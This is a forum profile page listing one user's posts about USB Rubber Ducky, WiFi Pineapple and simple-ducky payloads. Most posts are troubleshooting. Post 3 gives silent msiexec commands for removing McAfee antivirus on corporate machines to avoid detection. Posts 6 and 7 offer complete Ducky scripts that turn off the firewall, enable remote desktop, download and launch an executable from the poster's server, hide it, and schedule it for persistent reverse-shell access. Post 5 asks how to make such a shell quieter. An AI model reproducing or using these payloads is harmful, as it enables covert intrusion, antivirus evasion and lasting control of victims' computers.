Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

Everything posted by TeCHemically

  1. After further testing it appears as though the SD cards have been somehow corrupted or damaged by the twin ducky. I reflashed the firmware and got not change. I checked the SD cards on 2 other PCs (one linux one windows) and on the windows PC I got "I/O" errors in the pop up dialog box. I am always "safely removing" the mounted storage before I take it out of the PC I am working on. Has anyone else had SD corruption issues with the twin duck? Thanks to all who reply! :)
  2. I am also having issues with Twin Duck original firmware. It has been functional through my testing today but just about a half hour ago the DUCKY storage drive no longer mounts and the inject.bin does not run either. Tried on 2 PCs. I get an alternating fast and slow red LED flashing on one PC and I get no lights at all on the other. The storage will mount if I put the SD card in another reader.
  3. I found the following little tid bit that has been of great use in corporate environments. Simply adding the appropriate line toward the top of your ducky script (or adding them all just in case works too) can significantly decrease AV detection (considering it removes it from the equation!) :D VirusScan Enterprise (VSE) command line removal using msiexec.exe: Click Start, Run. Type the removal string for your version of VSE, then click OK. VirusScan Enterprise 8.8 msiexec /x {CE15D1B6-19B6-4D4D-8F43-CF5D2C3356FF} REMOVE=ALL REBOOT=R /q VirusScan Enterprise 8.7i msiexec /x {147BCE03-C0F1-4C9F-8157-6A89B6D2D973} REMOVE=ALL REBOOT=R /q VirusScan Enterprise 8.5i msiexec.exe /x {35C03C04-3F1F-42C2-A989-A757EE691F65} REMOVE=ALL REBOOT=R /q VirusScan Enterprise 8.0i msiexec.exe /x {5DF3D1BB-894E-4DCD-8275-159AC9829B43} REMOVE=ALL REBOOT=R /q Switches that you can use with msiexec.exe: /q The quiet switch ensures the removal is done silently - nothing is displayed. /x This switch will automatically remove an installation. /i This switch will communicate via the UI (User Interface) and is used to Repair, Remove, or Modify an installation. /? This switch provides additional information on all msiexec.exe command switches.
  4. Thanks for the help! :) Can the 64bit https meterpreter shell run on a 32 bit machine? Also, I generated the above mentioned dll via msfconsole but the command I used just allowed me to specify https. Is this created 64 bit by default or is there a part of the command I missed that will create the 64 bit shell? Thanks again, this is a great method!
  5. Thanks for the feedback! :) Are there any other ways for a persistent method that is quieter? How could one go about dropping a persistent reverse shell without the resulting connetion being so noticable? I try to make sure my listener is on a common port so it can get through the network firewall and it is working on the corporate network I have available for testing currently. Any guidance is appreciated, thakns again!
  6. Ok, I added a bit more to make persistence truly persistent. This now changes the attributes of the winmgmt.exe file to a hidden system file so it is not ordinarily visible. It also creates a scheduled task to run this every 2 hours in case connection is lost. If this task has already been run in the past it will replace the scheduled task with the name "Management". DELAY 5000 ESCAPE DELAY 400 CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 700 ALT Y DELAY 800 ENTER STRING netsh firewall set opmode disable ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f ENTER DELAY 300 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'" ENTER DELAY 300 STRING attrib +H +S "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe" ENTER DELAY 300 STRING schtasks /create /tn Management /tr "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe" /sc hourly /mo 2 ENTER DELAY 300 STRING y ENTER STRING exit ENTER
  7. This is a simple modification to the powershell reverse payload w/UAC for Win7 in simple-ducky to make it persistent. All credit goes to Skysploit for this payload! I added the quicker UAC bypass method and edited the location that the EXE is placed for persistence. Verified system privileges after log off and reboots! :D ****************************************************************************************************************************** DELAY 5000 ESCAPE DELAY 400 CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 700 ALT Y DELAY 800 ENTER STRING netsh firewall set opmode disable ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f ENTER DELAY 300 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'" ENTER STRING exit ENTER ****************************************************************************************************************************** You MUST use simple-ducky by Skysploit to generate this payload and place the winmgmt.txt file in your webserver location. After you have gone through creating the payload simply delete the created "inject.bin" file and open the "payload.txt" file for editing. Delete all text and paste in the payload code above. Then in terminal type the following 2 commands: cd /usr/share/ducky/encoder (for Kali, if using a different OS then cd to the directory your "encoder.jar" file is in) java -jar encoder.jar -i payload.txt -o inject.bin (now place the "inject.bin" file on your ducky and use as you normally would)
  8. Everything appears to have been successful on the client side; but I dont get the shell on my VPS. I am using other 443 meterpreter reverse shells in the same environment successfully so I know it is not a network issue. EDIT: re-ran everything and now all is well. Great job!! If only there was a way to make this persistent.
  9. No, thank you for taking the time to produce this! I ran it this morning and all appears well. What directory does the txt file get created in?...Nevermind, I found it in home directory. Thanks again! :)
  10. Great script, I am super excited to test this one out :D One problem though for me so far. Just like overwraith's issue. I have metasploit fully updated as of less than 5 mintues ago from the time of this post and have postgresql and metasploit services started. I am still getting the below error: [*] Generating shellcode /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in ``': No such file or directory - /opt/metasploit-framework/./msfvenom --payload windows/meterpreter/reverse_tcp LHOST= LPORT=443 C (Errno::ENOENT) from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in `shellcode_gen' from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:83:in `<main>' Do I need to have the msfconsole up? Why am I getting this error? Thanks to all who reply! :)
  11. Thanks Seb, great to have you full time on this project!
  12. Ok, tried a different USB drive with more space just in case. I reset the pineapple and ran all the installs fresh. Everything has installed now except mdk3. It wont install internally or to usb. I definitely have enough space and have rebooted. Also, the SSID persistent setting does not work after reboots.
  13. Sorry Seb, but the pineapple bar update did not fix the issue in any previous attempts. I went through the whole re-flash and update process again and for some reason this time it is installing things. I am having to try many times for a couple items but they are now installing. Thanks for your replies! The only 3 now that are not installing are sslstrip, get, and mdk3. The tiles for sslstrip and mdk3 are there but they wont install. The newcomer "get" does not install properly at all. It does appear to but no tile results and under installed items it is listed with no size value next to it. That one may be a bug with the new infusion. The other 2 may be a space issue. How much space do each one take and where can I look to verify that I have enough space left?
  14. Thanks for your responses. Unfortunately I verified the md5 both times I downloaded the firmware; and I updated the pineapple bar each time I have reset or re-flashed first thing. Still having the same issues.
  15. I have reset my pineapple many times and have reinstalled the new 3.0.0 firmware but still am getting a very low percentage of infusions that will install at all (only one installed successfully this go around). Some that appear to install but give an error in hte tile or simply say "not installed" in the tile and cannot be installed from their main window. Most freeze on the percent installed pop up box and never get past it. I am having the SSID persistent issue with karma also. Please help! My once grand and uselful tool is now a source of extreme frustration and regret.
  16. I ran the 32 bit setup and selected the "/usr/lib/jvm/jdk1.7.0_17/jre/bin/java" option. The following error is what I get: Your new JDk version is... /usr/bin/simple-ducky: line 3892: /usr/bin/java: cannot execute binary file Would you like to return to the main menu [y/n]? When I try to generate the inject.bin from a selected payload I get the following: Generating your inject.bin file... /usr/bin/simple-ducky: line 1021: /usr/bin/java: cannot execute binary file Your payload has been created, its located in /usr/share/ducky/encoder Your evil executable has been created, it is in located at /var/www/winmgmt.txt Press any key to contiue
  17. Thanks skysploit! I am running kali 1.0.3 686. This happens with every payload I try. This is my output from that last bit: java -version java version "1.6.0_27" OpenJDK Runtime Environment (IcedTea6 1.12.4) (6b27-1.12.4-1) OpenJDK Server VM (build 20.0-b12, mixed mode) So it appears that my java update has not gone through successfully. I have tried this on a kali 1.0.2 686 VM, kali 1.0.3 686 VM , and on a BT5r3 VM. All failed in much the same way.
  18. That you for the response! Please forgive my ignorrance; but I still do not know exactly how to accomplish this, or even if it is the real issue. Will simply running these commands is sequencial order resolve this issue? I tried the first two commands in kali and neither one are accepted as valid commands.
  19. Ok, it seems that this issue is caused by the java environment variable pointing to the wrong version. How can I change this variable to point to the 1.7.0 java version that simple ducky installs?
  20. I get the following error on all payloads that I try to generate on Kali 1.0.3 VM (I have already updated 64 bit java) Exception in thread "main" java.lang.UnsupportedClassVersionError: Encoder : Unsupported major.minor version 51.0 at java.lang.ClassLoader.defineClass1(Native Method) at java.lang.ClassLoader.defineClass(ClassLoader.java:634) at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:142) at java.net.URLClassLoader.defineClass(URLClassLoader.java:277) at java.net.URLClassLoader.access$000(URLClassLoader.java:73) at java.net.URLClassLoader$1.run(URLClassLoader.java:212) at java.security.AccessController.doPrivileged(Native Method) at java.net.URLClassLoader.findClass(URLClassLoader.java:205) at java.lang.ClassLoader.loadClass(ClassLoader.java:321) at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:294) at java.lang.ClassLoader.loadClass(ClassLoader.java:266) Could not find the main class: Encoder. Program will exit. The end result is that no inject.bin file is ever created. The payload.txt file is created; but I cannot manually from terminal use encoder to convert that to the inject.bin either. Kali linux has the pae kernel and should be considered 64 bit right? When I updated java should I have selected 32 bit? Could that be the cause of my grief? UPDATE: Just tried this all out in BT5r3 with the other linux installer and I am getting the exact same error. I know it is 32 bit and I used the 32 bit java update option. I am not even getting the payload.txt generated in the ducky folder in BT5r3. Also, when installing dependencies it downloaded the latest 64 bit metasploit installer; but MSF is already installed and fully updated. Should I bother running this installer? I fear it will bork up my MSF install. Thanks for all who respond! :)
  21. I am not getting the option to install to USB after following Darren's instructions. The lsusb output shows a "device 001: ID xxxx:xxxx linux foundation 2.0 root hub" & "device 003: ID xxxx:xxxx super top". My fstab shows config mount data for the /dev/sda1 under /usb set as ext4 with "rw,sync" options and "option enabled_fsck 0". under config swap option device shows "/dev/sda2" & option enabled shows "1". Any idea why this is failing?
  22. I also have USB with swap mounted and writable but sslstrip fails to install to it or to the internal memory. infusion module is installed but sslstrip itself wont install.
  23. I am having the same issue with an attempted DNS spoof to an https site; fails everytime.
  24. Thanks for your help! I found this one closer http://www.ebay.com/itm/290803061413?ssPageName=STRK:MEWNX:IT&_trksid=p3984.m1497.l2649 will it work? Holding the reset button for 7 seconds did not change anything but I do have the default SSID now being broadcast. When I try to connect to the browser I still have the redirect error. If I attempt the IP:1471 I am now getting the page and all the defaults are reset. How can I go about fixing this redirect issue? Also, to the other reply, no I did not look at the change log. Did I miss something important? I did read that 2.7.0 was a stable release but did not go farther than that. My apologies for my frustration yesterday and thank you for you help!
  • Create New...